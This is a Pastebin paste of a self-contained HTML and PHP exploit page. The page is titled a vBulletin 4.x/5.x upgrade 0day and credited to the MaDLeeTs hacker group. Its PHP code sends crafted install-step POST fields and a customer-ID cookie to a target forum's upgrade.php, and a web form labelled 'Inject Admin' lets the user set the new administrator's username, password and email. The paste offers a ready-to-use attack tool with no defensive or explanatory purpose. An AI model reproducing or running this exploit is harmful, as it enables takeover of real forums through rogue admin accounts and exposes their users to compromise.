Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <html xmlns="http://www.w3.org/1999/xhtml"><head>
- <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
- <title>vBulletin 0day</title>
- <style type="text/css">
- <!--
- body {
- background-color: #000;
- text-align: center;
- color: #063;
- font-size: large;
- }
- .a { font-size: 24px;
- }
- .f { color: #060;
- }
- .gbf { color: #F00;
- }
- .dd {
- color: #F00;
- }
- .w {
- font-size: large;
- }
- a:link {
- text-decoration: none;
- }
- a:visited {
- text-decoration: none;
- }
- a:hover {
- text-decoration: none;
- }
- a:active {
- text-decoration: none;
- }
- -->
- </style></head><body>
- <p class="a">
- <h1><span class="gbf">vBulletin</span> 4.x.x and 5.x.x Upgrade 0day Exploit</h1>
- <br>Created by: 1337
- <br>Found on: 08/22/2013
- <br>Website: http://www.madleets.com
- </p>
- <br>
- <?php
- //extract data from the post
- if(isset($_POST['submit'])){
- extract($_POST);
- //set POST variables
- $url = $_POST['url'];
- $fields = array(
- 'ajax' => urlencode('1'),
- 'version' => urlencode('install'),
- 'checktable' => urlencode('false'),
- 'firstrun' => urlencode('false'),
- 'step' => urlencode('7'),
- 'startat' => urlencode('0'),
- 'only' => urlencode('false'),
- 'customerid' => urlencode($_POST['customerid']),
- 'options[skiptemplatemerge]' => urlencode('0'),
- 'response' => urlencode('yes'),
- 'htmlsubmit' => urlencode('1'),
- 'htmldata[username]' => urlencode($_POST['username']),
- 'htmldata[password]' => urlencode($_POST['password']),
- 'htmldata[confirmpassword]' => urlencode($_POST['password']),
- 'htmldata[email]' => urlencode($_POST['email'])
- );
- //url-ify the data for the POST
- foreach($fields as $key=>$value) { $fields_string .= $key.'='.$value.'&'; }
- rtrim($fields_string, '&');
- //open connection
- $ch = curl_init();
- //set the url, number of POST vars, POST data
- curl_setopt($ch,CURLOPT_URL, $url);
- curl_setopt($ch,CURLOPT_POST, count($fields));
- curl_setopt($ch,CURLOPT_POSTFIELDS, $fields_string);
- curl_setopt($ch, CURLOPT_COOKIESESSION, TRUE);
- curl_setopt($ch, CURLOPT_COOKIE, 'bbcustomerid='.$_POST['customerid'] );
- //execute post
- $result = curl_exec($ch);
- //close connection
- curl_close($ch);
- exit();
- }
- ?>
- <center>
- <form name="sploit" method="POST" action="<?php echo $_SERVER['REQUEST_URI']; ?>">
- <span>Example:http://test.com/forum/install/upgrade.php</span><br>
- <span>Website:</span>
- <input name="url" type="text" tabindex="1" size="60" />
- <br>
- <span>Customer ID:</span>
- <input name="customerid" type="text" tabindex="2" size="40" />
- <br>
- <span>Username:</span>
- <input name="username" type="text" tabindex="3" size="40" />
- <br>
- <span>Password:</span>
- <input name="password" type="text" tabindex="4" size="40" />
- <br>
- <span>Email:</span>
- <input name="email" type="text" tabindex="5" maxlength="40" />
- <input name="submit" type="submit" value="Inject Admin">
- </form>
- </center>
- <p class="a">------------------------------------------------------------------------------------------------------------------</p>
- <p class="a">We are L33t Pakistani H4x0rZ | MaDLeeTs TeaM </p>
- <p class="a">------------------------------------------------------------------------------------------------------------------</p>
- </div>
- </pre>
- <p class="a"> </p>
- <p align="center">
- </body></html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement